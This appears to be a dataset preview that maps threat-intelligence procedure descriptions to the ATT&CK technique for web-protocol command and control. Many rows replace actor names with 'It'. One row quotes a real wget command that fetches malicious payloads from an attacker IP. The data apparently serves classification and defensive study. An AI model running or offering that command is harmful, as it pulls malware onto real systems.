prompt
stringclasses 508
values | procedure
stringlengths 20
478
|
---|---|
Application Layer Protocol:Web Protocols
|
ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.
|
Application Layer Protocol:Web Protocols
|
Agent Tesla has used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Amadey has used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Anchor has used HTTP and HTTPS in C2 communications.
|
Application Layer Protocol:Web Protocols
|
ANDROMEDA has the ability to make GET requests to download files from C2.
|
Application Layer Protocol:Web Protocols
|
AppleJeus has sent data to its C2 server via POST requests.
|
Application Layer Protocol:Web Protocols
|
AppleSeed has the ability to communicate with C2 over HTTP.
|
Application Layer Protocol:Web Protocols
|
It uses HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
It used HTTP for C2 communications. It also used an HTTP malware variant to communicate over HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
Later implants used by It, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.
|
Application Layer Protocol:Web Protocols
|
It has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.
|
Application Layer Protocol:Web Protocols
|
It has used HTTP for command and control.
|
Application Layer Protocol:Web Protocols
|
It uses HTTPS to conceal C2 communications.
|
Application Layer Protocol:Web Protocols
|
It used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.
|
Application Layer Protocol:Web Protocols
|
It has used HTTP in communications with C2.
|
Application Layer Protocol:Web Protocols
|
It used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.
|
Application Layer Protocol:Web Protocols
|
Aria-body has used HTTP in C2 communications.
|
Application Layer Protocol:Web Protocols
|
AuTo Stealer can use HTTP to communicate with its C2 servers.
|
Application Layer Protocol:Web Protocols
|
Avenger has the ability to use HTTP in communication with C2.
|
Application Layer Protocol:Web Protocols
|
BackConfig has the ability to use HTTPS for C2 communiations.
|
Application Layer Protocol:Web Protocols
|
BACKSPACE uses HTTP as a transport to communicate with its command server.
|
Application Layer Protocol:Web Protocols
|
BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.
|
Application Layer Protocol:Web Protocols
|
BADNEWS establishes a backdoor over HTTP.
|
Application Layer Protocol:Web Protocols
|
BadPatch uses HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
Bankshot uses HTTP for command and control communication.
|
Application Layer Protocol:Web Protocols
|
Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.
|
Application Layer Protocol:Web Protocols
|
BBK has the ability to use HTTP in communications with C2.
|
Application Layer Protocol:Web Protocols
|
BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.
|
Application Layer Protocol:Web Protocols
|
Bisonal has used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
It has used HTTP POST requests for C2.
|
Application Layer Protocol:Web Protocols
|
BlackEnergy communicates with its C2 server over HTTP.
|
Application Layer Protocol:Web Protocols
|
BlackMould can send commands to C2 in the body of HTTP POST requests.
|
Application Layer Protocol:Web Protocols
|
BLINDINGCAN has used HTTPS over port 443 for command and control.
|
Application Layer Protocol:Web Protocols
|
BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.
|
Application Layer Protocol:Web Protocols
|
BoomBox has used HTTP POST requests for C2.
|
Application Layer Protocol:Web Protocols
|
It malware has used HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.
|
Application Layer Protocol:Web Protocols
|
BUBBLEWRAP can communicate using HTTP or HTTPS.
|
Application Layer Protocol:Web Protocols
|
Bundlore uses HTTP requests for C2.
|
Application Layer Protocol:Web Protocols
|
During C0017, It ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.
|
Application Layer Protocol:Web Protocols
|
During C0018, the threat actors used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
During C0021, the threat actors used HTTP for some of their C2 communications.
|
Application Layer Protocol:Web Protocols
|
The It malware communicates to its command server using HTTP with an encrypted payload.
|
Application Layer Protocol:Web Protocols
|
Carberp has connected to C2 servers via HTTP.
|
Application Layer Protocol:Web Protocols
|
Carbon can use HTTP in C2 communications.
|
Application Layer Protocol:Web Protocols
|
Cardinal RAT is downloaded using HTTP over port 443.
|
Application Layer Protocol:Web Protocols
|
Chaes has used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
CharmPower can use HTTP to communicate with C2.
|
Application Layer Protocol:Web Protocols
|
ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.
|
Application Layer Protocol:Web Protocols
|
It has used HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
China Chopper's server component executes code sent via HTTP POST commands.
|
Application Layer Protocol:Web Protocols
|
Various implementations of CHOPSTICK communicate with C2 over HTTP.
|
Application Layer Protocol:Web Protocols
|
Clambling has the ability to communicate over HTTP.
|
Application Layer Protocol:Web Protocols
|
One variant of CloudDuke uses HTTP and HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
It has used HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.
|
Application Layer Protocol:Web Protocols
|
Comnie uses HTTP for C2 communication.
|
Application Layer Protocol:Web Protocols
|
ComRAT has used HTTP requests for command and control.
|
Application Layer Protocol:Web Protocols
|
It has used HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
CORESHELL can communicate over HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.
|
Application Layer Protocol:Web Protocols
|
CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.
|
Application Layer Protocol:Web Protocols
|
CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.
|
Application Layer Protocol:Web Protocols
|
CreepySnail can use HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
Crimson can use a HTTP GET request to download its final payload.
|
Application Layer Protocol:Web Protocols
|
Crutch has conducted C2 communications with a Dropbox account using the HTTP API.
|
Application Layer Protocol:Web Protocols
|
CSPY Downloader can use GET requests to download additional payloads from C2.
|
Application Layer Protocol:Web Protocols
|
Cyclops Blink can download files via HTTP and HTTPS.
|
Application Layer Protocol:Web Protocols
|
Dacls can use HTTPS in C2 communications.
|
Application Layer Protocol:Web Protocols
|
DanBot can use HTTP in C2 communication.
|
Application Layer Protocol:Web Protocols
|
It's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string "&&&".
|
Application Layer Protocol:Web Protocols
|
DarkComet can use HTTP for C2 communications.
|
Application Layer Protocol:Web Protocols
|
DarkTortilla has used HTTP and HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
DarkWatchman uses HTTPS for command and control.
|
Application Layer Protocol:Web Protocols
|
Daserf uses HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
DealersChoice uses HTTP for communication with the C2 server.
|
Application Layer Protocol:Web Protocols
|
DEATHRANSOM can use HTTPS to download files.
|
Application Layer Protocol:Web Protocols
|
Diavol has used HTTP GET and POST requests for C2.
|
Application Layer Protocol:Web Protocols
|
Dipsind uses HTTP for C2.
|
Application Layer Protocol:Web Protocols
|
Doki has communicated with C2 over HTTPS.
|
Application Layer Protocol:Web Protocols
|
Donut can use HTTP to download previously staged shellcode payloads.
|
Application Layer Protocol:Web Protocols
|
down_new has the ability to use HTTP in C2 communications.
|
Application Layer Protocol:Web Protocols
|
DownPaper communicates to its C2 server over HTTP.
|
Application Layer Protocol:Web Protocols
|
DRATzarus can use HTTP or HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Dridex has used POST requests and HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.
|
Application Layer Protocol:Web Protocols
|
DustySky has used both HTTP and HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
Dyre uses HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Egregor has communicated with its C2 servers via HTTPS protocol.
|
Application Layer Protocol:Web Protocols
|
Elise communicates over HTTP or HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
ELMER uses HTTP for command and control.
|
Application Layer Protocol:Web Protocols
|
Emissary uses HTTP or HTTPS for C2.
|
Application Layer Protocol:Web Protocols
|
Emotet has used HTTP for command and control.
|
Application Layer Protocol:Web Protocols
|
Empire can conduct command and control over protocols like HTTP and HTTPS.
|
Application Layer Protocol:Web Protocols
|
Epic uses HTTP and HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
EvilBunny has executed C2 commands directly via HTTP.
|
Application Layer Protocol:Web Protocols
|
Exaramel for Linux uses HTTPS for C2 communications.
|
Application Layer Protocol:Web Protocols
|
Explosive has used HTTP for communication.
|
Application Layer Protocol:Web Protocols
|
FatDuke can be controlled via a custom C2 protocol over HTTP.
|
Application Layer Protocol:Web Protocols
|
Felismus uses HTTP for C2.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.